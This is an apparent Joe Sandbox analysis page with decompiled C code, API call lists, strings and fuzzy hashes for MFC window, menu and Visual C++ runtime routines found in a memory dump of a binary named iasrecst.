				void* _t67;
				int _t69;
				intOrPtr _t73;
				int _t74;
				int _t75;
				intOrPtr* _t77;
				struct HMENU__* _t83;
				intOrPtr _t84;

				_t73 = __ecx;
				_v8 = __ecx;
				_t53 = E0041A8B4( *((intOrPtr*)(__ecx + 0x1c)));
				if(_a12 == 0) {
					_t77 =  *((intOrPtr*)(__ecx + 0x68));
					_t84 = _a4;
					if(_t77 == 0) {
						L3:
						E00412F9D( &_v48);
						_v36 = _t84;
						if( *((intOrPtr*)(E004249C4() + 0x54)) !=  *(_t84 + 4)) {
							if(GetMenu( *(_t73 + 0x1c)) != 0) {
								_t67 = E00414CEF(_t73);
								if(_t67 != 0) {
									_t83 = GetMenu( *(_t67 + 0x1c));
									if(_t83 != 0) {
										_t69 = GetMenuItemCount(_t83);
										_t75 = 0;
										_a12 = _t69;
										if(_t69 > 0) {
											while(GetSubMenu(_t83, _t75) !=  *(_t84 + 4)) {
												_t75 = _t75 + 1;
												if(_t75 < _a12) {
													continue;
												} else {
												}
												goto L13;
											}
											_push(_t83);
											_v12 = E00417635();
										}
										L13:
										_t73 = _v8;
									}
								}
							}
						} else {
							_v12 = _t84;
						}
						_t53 = GetMenuItemCount( *(_t84 + 4));
						_v40 = _v40 & 0x00000000;
						_v16 = _t53;
						if(_t53 > 0) {
							do {
								_t58 = GetMenuItemID( *(_t84 + 4), _v40);
								_v44 = _t58;
								if(_t58 != 0) {
									if(_t58 != 0xffffffff) {
										_v32 = _v32 & 0x00000000;
										if( *((intOrPtr*)(_t73 + 0x3c)) != 0 && _t58 < 0xf000) {
											_push(1);
											_pop(0);
										}
										_push(0);
										goto L27;
									} else {
										_push(GetSubMenu( *(_t84 + 4), _v40));
										_t65 = E00417635();
										_v32 = _t65;
										if(_t65 != 0) {
											_t66 = GetMenuItemID( *(_t65 + 4), 0);
											_v44 = _t66;
											if(_t66 != 0 && _t66 != 0xffffffff) {
												_push(0);
												L27:
												_push(_t73);
												E00413162( &_v48);
												_t61 = GetMenuItemCount( *(_t84 + 4));
												_t74 = _t61;
												if(_t74 < _v16) {
													_v40 = _v40 + _t61 - _v16;
													while(_v40 < _t74 && GetMenuItemID( *(_t84 + 4), _v40) == _v44) {
														_v40 = _v40 + 1;
													}
												}
												_v16 = _t74;
												_t73 = _v8;
											}
										}
									}
								}
								_v40 = _v40 + 1;
								_t53 = _v40;
							} while (_t53 < _v16);
						}
					} else {
						_t53 =  *((intOrPtr*)( *_t77 + 0x74))(_t84, _a8, 0);
						if(_t53 == 0) {
							goto L3;
						}
					}
				}
				return _t53;
			}

APIs

Part of subcall function 0041A8B4: GetFocus.USER32(?,?,?,00421870,?), ref: 0041A8B7
Part of subcall function 0041A8B4: GetParent.USER32(00000000), ref: 0041A8DE
Part of subcall function 0041A8B4: GetWindowLongA.USER32 ref: 0041A8F9
Part of subcall function 0041A8B4: GetParent.USER32(?), ref: 0041A907
Part of subcall function 0041A8B4: GetDesktopWindow.USER32 ref: 0041A90B
Part of subcall function 0041A8B4: SendMessageA.USER32 ref: 0041A91F

GetMenu.USER32(?), ref: 004218BD
GetMenu.USER32(?), ref: 004218D1
GetMenuItemCount.USER32 ref: 004218DA
GetSubMenu.USER32 ref: 004218EB
GetMenuItemCount.USER32 ref: 0042190D
GetMenuItemID.USER32(?,00000000), ref: 0042192E
GetSubMenu.USER32 ref: 00421946
GetMenuItemID.USER32(?,00000000), ref: 0042195E
GetMenuItemCount.USER32 ref: 00421995
GetMenuItemID.USER32(?,00000000), ref: 004219B3

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
String ID:
API String ID: 4186786570-0
Opcode ID: 6dca45552e476573e8ddd484fced48f908dc2b4a0e5e43a68bf7886d0696cfe4
Instruction ID: c2df077858419d5e37a5876f97d7879e649ce0b97625e1102e6641939069eb9a
Opcode Fuzzy Hash: 6dca45552e476573e8ddd484fced48f908dc2b4a0e5e43a68bf7886d0696cfe4
Instruction Fuzzy Hash: C35190B0B002189FCF11EF65D990BAEB7B5EF18314FA0446AE411E6261D739DD82DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00420900, Relevance: 15.1, APIs: 10, Instructions: 102
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00420900() {
				void* __ecx;
				void* __ebp;
				struct HWND__* _t21;
				int _t33;
				void* _t40;
				void* _t41;
				struct HWND__* _t46;
				struct HWND__* _t47;
				signed int _t48;
				signed int _t49;
				void* _t50;

				_t40 = _t41;
				 *(_t40 + 0xa0) =  *(_t40 + 0xa0) + 1;
				_t21 = _t40 + 0xa0;
				if( *(_t40 + 0xa0) > 1) {
					L18:
					return _t21;
				}
				 *((intOrPtr*)(_t50 + 0x14)) = E00414CEF(_t41);
				_t48 = 0;
				_t21 = GetWindow(GetDesktopWindow(), 5);
				_t46 = _t21;
				if(_t46 == 0) {
					goto L18;
				} else {
					goto L2;
				}
				do {
					L2:
					if(IsWindowEnabled(_t46) != 0) {
						_push(_t46);
						if(E00413767() != 0 && E004208E0( *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x10)) + 0x1c)), _t46) != 0 && SendMessageA(_t46, 0x36c, 0, 0) == 0) {
							_t48 = _t48 + 1;
						}
					}
					_t21 = GetWindow(_t46, 2);
					_t46 = _t21;
				} while (_t46 != 0);
				if(_t48 != 0) {
					 *(_t40 + 0xa4) = E004131DD(4 + _t48 * 4);
					_push(5);
					_t49 = 0;
					_push(GetDesktopWindow());
					while(1) {
						_t47 = GetWindow();
						if(_t47 == 0) {
							break;
						}
						if(IsWindowEnabled(_t47) != 0) {
							_push(_t47);
							if(E00413767() != 0 && E004208E0( *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x10)) + 0x1c)), _t47) != 0) {
								_t33 = SendMessageA(_t47, 0x36c, 0, 0);
								if(_t33 == 0) {
									EnableWindow(_t47, _t33);
									( *(_t40 + 0xa4))[_t49] = _t47;
									_t49 = _t49 + 1;
								}
							}
						}
						_push(2);
						_push(_t47);
					}
					_t21 =  *(_t40 + 0xa4);
					_t21[_t49] = _t21[_t49] & 0x00000000;
				}
			}

APIs

GetDesktopWindow.USER32 ref: 0042092D
GetWindow.USER32(00000000), ref: 0042093A
IsWindowEnabled.USER32(00000000), ref: 00420947
SendMessageA.USER32 ref: 00420976
GetWindow.USER32(00000000,00000002), ref: 00420984
GetDesktopWindow.USER32 ref: 004209AC
GetWindow.USER32(00000000), ref: 004209B3
IsWindowEnabled.USER32(00000000), ref: 004209BC
SendMessageA.USER32 ref: 004209EB
EnableWindow.USER32(00000000,00000000), ref: 004209F7

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Window$DesktopEnabledMessageSend$Enable
String ID:
API String ID: 2339141687-0
Opcode ID: b425f5d9508085c9cae4404486b252f16e1b35d7c8077e0574aa4d7a51abd98b
Instruction ID: 9d4a9da4e21fb217c8a7ce5c71c2f292f8e7f618580f1a2ae5b0fad087dd6ca4
Opcode Fuzzy Hash: b425f5d9508085c9cae4404486b252f16e1b35d7c8077e0574aa4d7a51abd98b
Instruction Fuzzy Hash: 6B31B1717013286FE731AF25AC05B6B779CEF01795F850026FE41DA293DB68C8418AED

Uniqueness

Uniqueness Score: -1.00%

Function 0041EC61, Relevance: 15.1, APIs: 10, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041EC61(void* __ecx, int _a4) {
				int _v8;
				struct tagRECT _v24;
				int _t39;
				int _t42;
				int _t61;
				int _t64;
				void* _t66;
				long _t67;
				int _t69;

				_t67 = _a4;
				_t66 = __ecx;
				_t39 = DefWindowProcA( *(__ecx + 0x1c), 0x46, 0, _t67);
				if(( *(_t67 + 0x18) & 0x00000001) == 0) {
					GetWindowRect( *(_t66 + 0x1c),  &_v24);
					_t42 = _a4;
					_t69 = _v24.right - _v24.left;
					_t64 =  *(_t42 + 0x10);
					_t61 = _v24.bottom - _v24.top;
					_t39 =  *(_t42 + 0x14);
					_v8 = _t64;
					_a4 = _t39;
					if(_t64 != _t69 && ( *(_t66 + 0x65) & 0x00000004) != 0) {
						SetRect( &_v24, _t64 -  *0x439bf0, 0, _t64, _t39);
						InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
						SetRect( &_v24, _t69 -  *0x439bf0, 0, _t69, _a4);
						InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
						_t64 = _v8;
						_t39 = _a4;
					}
					if(_t39 != _t61 && ( *(_t66 + 0x65) & 0x00000008) != 0) {
						SetRect( &_v24, 0, _t39 -  *0x439bf4, _t64, _t39);
						InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
						SetRect( &_v24, 0, _t61 -  *0x439bf4, _v8, _t61);
						return InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
					}
				}
				return _t39;
			}

APIs

DefWindowProcA.USER32(?,00000046,00000000,?), ref: 0041EC77
GetWindowRect.USER32 ref: 0041EC8E
SetRect.USER32 ref: 0041ECC8
InvalidateRect.USER32(?,?,00000001), ref: 0041ECD7
SetRect.USER32 ref: 0041ECEE
InvalidateRect.USER32(?,?,00000001), ref: 0041ECFD
SetRect.USER32 ref: 0041ED28
InvalidateRect.USER32(?,?,00000001), ref: 0041ED33
SetRect.USER32 ref: 0041ED4A
InvalidateRect.USER32(?,?,00000001), ref: 0041ED55

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Rect$Invalidate$Window$Proc
String ID:
API String ID: 570070710-0
Opcode ID: 8724871abec8598df3563b0eda9aa5d8796d70e5df21c29b53d9ac8203d78ebf
Instruction ID: 516b3e1e2029e257780fbb0876dd7829c2ddb4b881f79dfa1f5106cbf91c212e
Opcode Fuzzy Hash: 8724871abec8598df3563b0eda9aa5d8796d70e5df21c29b53d9ac8203d78ebf
Instruction Fuzzy Hash: EC31CB7590020ABFDB10DF94ED88FAA7B7DFB04344F544125FA01A61A0D774AE95CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409911, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E00409911(void* __edi, long _a4) {
				char _v164;
				char _v424;
				int _t17;
				long _t19;
				signed int _t42;
				long _t47;
				void* _t48;
				signed int _t54;
				void** _t56;
				void* _t57;

				_t48 = __edi;
				_t47 = _a4;
				_t42 = 0;
				_t17 = 0x437068;
				while(_t47 !=  *_t17) {
					_t17 = _t17 + 8;
					_t42 = _t42 + 1;
					if(_t17 < 0x4370f8) {
						continue;
					}
					break;
				}
				_t54 = _t42 << 3;
				_t2 = _t54 + 0x437068; // 0x3c000000
				if(_t47 ==  *_t2) {
					_t17 =  *0x439cf0; // 0x0
					if(_t17 == 1 || _t17 == 0 &&  *0x436ba4 == 1) {
						_t16 = _t54 + 0x43706c; // 0x42f53c
						_t56 = _t16;
						_t19 = E00405A40( *_t56);
						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
					} else {
						if(_t47 != 0xfc) {
							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
								E00409B00( &_v424, "<program name unknown>");
							}
							_push(_t48);
							_t49 =  &_v424;
							if(E00405A40( &_v424) + 1 > 0x3c) {
								_t49 = E00405A40( &_v424) +  &_v424 - 0x3b;
								E0040AD30(E00405A40( &_v424) +  &_v424 - 0x3b, "...", 3);
								_t57 = _t57 + 0x10;
							}
							E00409B00( &_v164, "Runtime Error!\n\nProgram: ");
							E00409B10( &_v164, _t49);
							E00409B10( &_v164, "\n\n");
							_t12 = _t54 + 0x43706c; // 0x42f53c
							E00409B10( &_v164,  *_t12);
							_t17 = E0040AC99( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return _t17;
			}

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 0040997E
GetStdHandle.KERNEL32(000000F4,0042F53C,00000000,?,00000000,?), ref: 00409A54
WriteFile.KERNEL32(00000000), ref: 00409A5B

Strings

hpC, xrefs: 0040991F
<program name unknown>, xrefs: 0040998E
Microsoft Visual C++ Runtime Library, xrefs: 00409A2A
..., xrefs: 004099D0
Runtime Error!Program: , xrefs: 004099E4

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $hpC
API String ID: 3784150691-1464146632
Opcode ID: 33035c65495730e30a5fb77a12ee862b660262d042e41123e8c96b74bcb04291
Instruction ID: b539e999a38423ee123e62db49a79e9b5e142f56b6bf41d1579e584f354440c8
Opcode Fuzzy Hash: 33035c65495730e30a5fb77a12ee862b660262d042e41123e8c96b74bcb04291
Instruction Fuzzy Hash: AF31C372700218AEDF20EA61DC86FAA377CEB45304F90047BF545F61C2E678AE84CE59

Uniqueness

Uniqueness Score: -1.00%

Function 0041538C, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0041538C(void* __ebx, void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				void* __ebp;
				void* _t14;
				void* _t17;
				void* _t18;
				void* _t28;
				struct HWND__* _t29;
				signed int _t33;
				void* _t36;
				void* _t40;
				void* _t43;

				_t28 = __ebx;
				_push(__ecx);
				_t36 = __ecx;
				_t40 = E00414CEF(__ecx);
				_t33 = _a4 & 0x0000fff0;
				_t14 = _t33 - 0xf040;
				if(_t14 == 0) {
					L12:
					if(_a8 != 0x75 || _t40 == 0) {
						L15:
						goto L16;
					} else {
						E004166F5(_t40);
						L11:
						_push(1);
						_pop(0);
						L16:
						return 0;
					}
				}
				_t17 = _t14 - 0x10;
				if(_t17 == 0) {
					goto L12;
				}
				_t18 = _t17 - 0x10;
				if(_t18 == 0 || _t18 == 0xa0) {
					if(_t33 == 0xf060 || _a8 != 0) {
						if(_t40 != 0) {
							_push(_t28);
							_t29 =  *(_t36 + 0x1c);
							_v8 = GetFocus();
							E00413740(_t43, SetActiveWindow( *(_t40 + 0x1c)));
							SendMessageA( *(_t40 + 0x1c), 0x112, _a4, _a8);
							if(IsWindow(_t29) != 0) {
								SetActiveWindow(_t29);
							}
							if(IsWindow(_v8) != 0) {
								SetFocus(_v8);
							}
						}
					}
					goto L11;
				} else {
					goto L15;
				}
			}

APIs

GetFocus.USER32 ref: 004153DC
SetActiveWindow.USER32(?), ref: 004153EE
SendMessageA.USER32 ref: 00415404
IsWindow.USER32(?), ref: 00415411
SetActiveWindow.USER32(?), ref: 00415418
IsWindow.USER32(?), ref: 0041541D
SetFocus.USER32(?), ref: 00415427

Strings

u, xrefs: 00415432

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Window$ActiveFocus$MessageSend
String ID: u
API String ID: 1556911595-4067256894
Opcode ID: 8c48182a88e980f122088be52c97c01ef4bfbd378e51f1298f5237cc586278ca
Instruction ID: 08e7680b70c01f71feb78b7b04bbbad669989e92906b740bb6337346909a31ec
Opcode Fuzzy Hash: 8c48182a88e980f122088be52c97c01ef4bfbd378e51f1298f5237cc586278ca
Instruction Fuzzy Hash: D2110372600619EBDB346F25ED48AEA7B64EB80315F448037E901962A1D77CDDC2DA98

Uniqueness

Uniqueness Score: -1.00%

Function 004170E7, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004170E7(intOrPtr __ecx, short _a4) {
				intOrPtr _v8;
				char _v40;
				void _v68;
				void* _t11;
				signed int _t15;
				int _t20;
				char* _t24;
				struct HDC__* _t26;

				_v8 = __ecx;
				_t20 = 0xa;
				_t24 = "System";
				_t11 = GetStockObject(0x11);
				if(_t11 != 0) {
					L2:
					if(GetObjectA(_t11, 0x3c,  &_v68) != 0) {
						_t24 =  &_v40;
						_t26 = GetDC(0);
						_t15 = _v68;
						if(_t15 < 0) {
							_v68 =  ~_t15;
						}
						_t20 = MulDiv(_v68, 0x48, GetDeviceCaps(_t26, 0x5a));
						ReleaseDC(0, _t26);
					}
					L6:
					if(_a4 == 0) {
						_a4 = _t20;
					}
					return E00416FCD(_v8, _t24, _a4);
				}
				_t11 = GetStockObject(0xd);
				if(_t11 == 0) {
					goto L6;
				}
				goto L2;
			}

APIs

GetStockObject.GDI32(00000011), ref: 00417103
GetStockObject.GDI32(0000000D), ref: 0041710B
GetObjectA.GDI32(00000000,0000003C,?), ref: 00417118
GetDC.USER32(00000000), ref: 00417127
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041713E
MulDiv.KERNEL32(?,00000048,00000000), ref: 0041714A
ReleaseDC.USER32 ref: 00417155

Strings

System, xrefs: 004170FC, 0041716B

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: 88a62be2883dc778bffe4279af9f13e5efe5524b205705b3f86c503938333c71
Instruction ID: aedc63dc14c356acfddf8dbf112d5b7e9114f9d10090a13ed9499bd610fb2d75
Opcode Fuzzy Hash: 88a62be2883dc778bffe4279af9f13e5efe5524b205705b3f86c503938333c71
Instruction Fuzzy Hash: 2F113371B00318BBEB209BA19C45FAF7B78FB05790F404026FA05E62C0D7749D42CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC99, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 46%

			E0040AC99(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t4;
				intOrPtr* _t7;
				_Unknown_base(*)()* _t11;
				void* _t14;
				struct HINSTANCE__* _t15;
				void* _t17;

				_t14 = 0;
				_t17 =  *0x439fd0 - _t14; // 0x0
				if(_t17 != 0) {
					L4:
					_t4 =  *0x439fd4; // 0x0
					if(_t4 != 0) {
						_t14 =  *_t4();
						if(_t14 != 0) {
							_t7 =  *0x439fd8; // 0x0
							if(_t7 != 0) {
								_t14 =  *_t7(_t14);
							}
						}
					}
					return  *0x439fd0(_t14, _a4, _a8, _a12);
				}
				_t15 = LoadLibraryA("user32.dll");
				if(_t15 == 0) {
					L10:
					return 0;
				}
				_t11 = GetProcAddress(_t15, "MessageBoxA");
				 *0x439fd0 = _t11;
				if(_t11 == 0) {
					goto L10;
				} else {
					 *0x439fd4 = GetProcAddress(_t15, "GetActiveWindow");
					 *0x439fd8 = GetProcAddress(_t15, "GetLastActivePopup");
					goto L4;
				}
			}

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00409A35,?,Microsoft Visual C++ Runtime Library,00012010,?,0042F53C,?,0042F58C,?,?,?,Runtime Error!Program: ), ref: 0040ACAB
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040ACC3
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0040ACD4
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040ACE1

Strings

MessageBoxA, xrefs: 0040ACBD
GetLastActivePopup, xrefs: 0040ACD6
user32.dll, xrefs: 0040ACA6
GetActiveWindow, xrefs: 0040ACCE

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
API String ID: 2238633743-4044615076
Opcode ID: 1c5d333bfefa196ee41cc629c286ab9d53157f6c4e3a187cce04e0c17d5edf39
Instruction ID: a9e059596031861d50e68843925f1eff39380896684ae965336398d5bbd15c8e
Opcode Fuzzy Hash: 1c5d333bfefa196ee41cc629c286ab9d53157f6c4e3a187cce04e0c17d5edf39
Instruction Fuzzy Hash: 42017131300311AFC7109FB4AC84A2B7BE9EE88791758103BE500E22F5DBB89C15DB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004160E6, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E004160E6(signed short _a4, signed int _a8) {
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t7;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				CHAR* _t16;
				signed short _t17;

				_t16 = "COMCTL32.DLL";
				_t14 = GetModuleHandleA(_t16);
				_t6 = LoadLibraryA(_t16);
				_t13 = _t6;
				if(_t13 == 0) {
					return _t6;
				} else {
					_t17 = 0;
					_t7 = GetProcAddress(_t13, "InitCommonControlsEx");
					if(_t7 != 0) {
						_push(_a4);
						if( *_t7() != 0) {
							_t17 = _a4;
							if(_t14 == 0) {
								__imp__#17();
								_t17 = _t17 | 0x00003fc0;
							}
						}
					} else {
						if((_a8 & 0x00003fc0) == _a8) {
							__imp__#17();
							_t17 = 0x3fc0;
						}
					}
					FreeLibrary(_t13);
					return _t17;
				}
			}

APIs

GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,004163E0,00000000,00020000,?,?,00000000), ref: 004160EF
LoadLibraryA.KERNEL32(COMCTL32.DLL,?,00000000,?,?,?,?,?,?,?,?,00411E7A,00000010,00000000), ref: 004160F8
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0041610C
#17.COMCTL32(?,00000000,?,?,?,?,?,?,?,?,00411E7A,00000010,00000000), ref: 00416127
#17.COMCTL32(?,00000000,?,?,?,?,?,?,?,?,00411E7A,00000010,00000000), ref: 00416143
FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,00411E7A,00000010,00000000), ref: 0041614F

Strings

COMCTL32.DLL, xrefs: 004160E8, 004160EE, 004160F5
InitCommonControlsEx, xrefs: 00416104

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Library$AddressFreeHandleLoadModuleProc
String ID: COMCTL32.DLL$InitCommonControlsEx
API String ID: 1437655972-4218389149
Opcode ID: e643cccf137e1cae2860d0c7a901f21b2a575cf028b437239449ca769040a35c
Instruction ID: 81bca5f6391c8e8793c086ec2d57317fbfa520992b7089d48771000b14303d3d
Opcode Fuzzy Hash: e643cccf137e1cae2860d0c7a901f21b2a575cf028b437239449ca769040a35c
Instruction Fuzzy Hash: B6F0A436704322A783229F64ED4896F73A9EF947627460436F841E3211DF28DC4687AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040BD71, Relevance: 13.7, APIs: 9, Instructions: 221
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040BD71(int _a4, int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				int _v36;
				short* _v40;
				short* _v44;
				char _v58;
				struct _cpinfo _v64;
				void* _v80;
				int _t65;
				int _t66;
				int _t69;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t86;
				int _t87;
				int _t88;
				void* _t96;
				char _t99;
				char _t101;
				intOrPtr _t104;
				intOrPtr _t105;
				int _t107;
				short* _t109;
				int _t111;
				int _t114;
				intOrPtr _t115;
				short* _t116;
				int _t118;

				_push(0xffffffff);
				_push(0x42f6e8);
				_push(E00409800);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t115;
				_t116 = _t115 - 0x30;
				_v28 = _t116;
				_t118 =  *0x43a068; // 0x0
				_t107 = 1;
				if(_t118 != 0) {
					L5:
					_t111 = _a16;
					if(_t111 > 0) {
						_t88 = E0040BFEE(_a12, _t111);
						_pop(_t96);
						_t111 = _t88;
						_a16 = _t111;
					}
					if(_a24 > 0) {
						_t87 = E0040BFEE(_a20, _a24);
						_pop(_t96);
						_a24 = _t87;
					}
					_t65 =  *0x43a068; // 0x0
					if(_t65 != 2) {
						if(_t65 != _t107) {
							goto L48;
						} else {
							if(_a28 == 0) {
								_t86 =  *0x439efc; // 0x0
								_a28 = _t86;
							}
							if(_t111 == 0 || _a24 == 0) {
								if(_t111 != _a24) {
									if(_a24 <= _t107) {
										if(_t111 > _t107) {
											L30:
											_push(3);
											goto L18;
										} else {
											if(GetCPInfo(_a28,  &_v64) == 0) {
												goto L48;
											} else {
												if(_t111 <= 0) {
													if(_a24 <= 0) {
														goto L39;
													} else {
														if(_v64 >= 2) {
															_t82 =  &_v58;
															if(_v58 != 0) {
																while(1) {
																	_t104 =  *((intOrPtr*)(_t82 + 1));
																	if(_t104 == 0) {
																		goto L20;
																	}
																	_t99 =  *_a20;
																	if(_t99 <  *_t82 || _t99 > _t104) {
																		_t82 = _t82 + 2;
																		if( *_t82 != 0) {
																			continue;
																		} else {
																			goto L20;
																		}
																	} else {
																		goto L17;
																	}
																	goto L49;
																}
															}
														}
														goto L20;
													}
												} else {
													if(_v64 >= 2) {
														_t84 =  &_v58;
														if(_v58 != 0) {
															while(1) {
																_t105 =  *((intOrPtr*)(_t84 + 1));
																if(_t105 == 0) {
																	goto L30;
																}
																_t101 =  *_a12;
																if(_t101 <  *_t84 || _t101 > _t105) {
																	_t84 = _t84 + 2;
																	if( *_t84 != 0) {
																		continue;
																	} else {
																		goto L30;
																	}
																} else {
																	goto L17;
																}
																goto L50;
															}
														}
													}
													goto L30;
													L50:
												}
											}
										}
									} else {
										L20:
										_t66 = _t107;
									}
								} else {
									L17:
									_push(2);
									L18:
									_pop(_t66);
								}
							} else {
